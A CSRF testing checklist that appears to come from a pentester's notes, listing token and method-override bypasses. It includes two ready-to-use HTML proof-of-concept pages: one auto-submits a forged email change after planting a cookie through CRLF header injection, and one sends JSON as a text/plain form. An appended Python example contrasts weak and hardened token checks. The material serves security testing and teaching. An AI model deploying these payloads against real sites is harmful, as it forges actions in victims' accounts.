
CSRF

CSRF Checklist

  • [ ] Remove Anti-CSRF Token

  • [ ] No check for the user's Token

  • [ ] Weak Token

  • [ ] Reusable token

  • [ ] Change request method

  • [ ] Guessable Token

  • [ ] Bypass referer

  • [ ] Modifying Parameter Names => POST to GET

  • [ ] Method override via parameter or header: `https://example.com/my/dear/api/val/num?_method=PUT`, or the headers `X-HTTP-Method`, `X-HTTP-Method-Override`, `X-Method-Override`

  • [ ] Custom header token bypass

  • [ ] Test the request without the customized token and also without the custom header

  • [ ] Test the request with a token of exactly the same length but a different value

  • [ ] CSRF token is verified by a cookie

```html
<html>
  <!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- Hidden form carrying the forged request; the csrf value is attacker-chosen -->
    <form action="https://example.com/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
      <input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- The image request uses a header-injection flaw in the search endpoint to set a
         csrf cookie with the same value; because the server only compares body token
         against cookie, the request is accepted. The form submits when the image fails. -->
    <img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
  </body>
</html>
```

💡 Note: if the CSRF token is tied to the session cookie, this attack won't work, because you would have to switch the victim into your own session, and you would then be attacking yourself.

Content-Type change

  • application/x-www-form-urlencoded

  • multipart/form-data

  • text/plain

```html
<html>
  <body>
    <!-- enctype="text/plain" makes the browser send each field as "name=value" with no
         encoding, so the field name and value are chosen to concatenate into a JSON body -->
    <form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
      <input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
    </form>
    <script>
      // The element id "form" is exposed as a global; submit as soon as the page loads
      form.submit();
    </script>
  </body>
</html>
```
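To make the two failure modes shown above concrete (a token that is only compared against a cookie, and a JSON endpoint reached through a text/plain form), here is an added Python example that is not part of the original page; the session store, token values, allowed origin and request bodies are constructed for illustration. The weak check reproduces the cookie-only comparison, while the hardened check requires the JSON content type, a same-origin Origin header, and a token bound to the server-side session.

```python
import hmac
import json
from urllib.parse import parse_qs

# Constructed server-side session store: session id -> CSRF token issued for that session
SESSIONS = {"sess-abc": "token-for-sess-abc"}
ALLOWED_ORIGIN = "https://example.com"  # constructed: the application's own origin


def weak_check(cookies, body):
    """The 'verified by a cookie' pattern: body token only has to equal the csrf cookie.
    Anyone who can plant a csrf cookie in the browser can satisfy this check."""
    form = parse_qs(body)
    return form.get("csrf", [None])[0] == cookies.get("csrf")


def text_plain_body(name, value):
    """How a browser serialises one field of an enctype="text/plain" form: name=value, CRLF."""
    return f"{name}={value}\r\n"


def parse_as_json(body):
    """Return the parsed JSON object, or None; shows why a lenient endpoint accepts the form body."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    return data if isinstance(data, dict) else None


def strong_check(headers, cookies, body):
    """Hardened check: JSON content type only, same-origin, token bound to the session."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False  # text/plain and form encodings are rejected before parsing
    if headers.get("Origin") != ALLOWED_ORIGIN:
        return False  # a cross-site form post carries the attacker's origin (or none)
    expected = SESSIONS.get(cookies.get("session"))
    data = parse_as_json(body)
    if expected is None or data is None:
        return False
    token = data.get("csrf")
    # Constant-time comparison against the token stored for this session, not a cookie
    return isinstance(token, str) and hmac.compare_digest(token, expected)
```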
Last updated 9 months ago

The second proof of concept above is an example (from here) of sending JSON data as text/plain.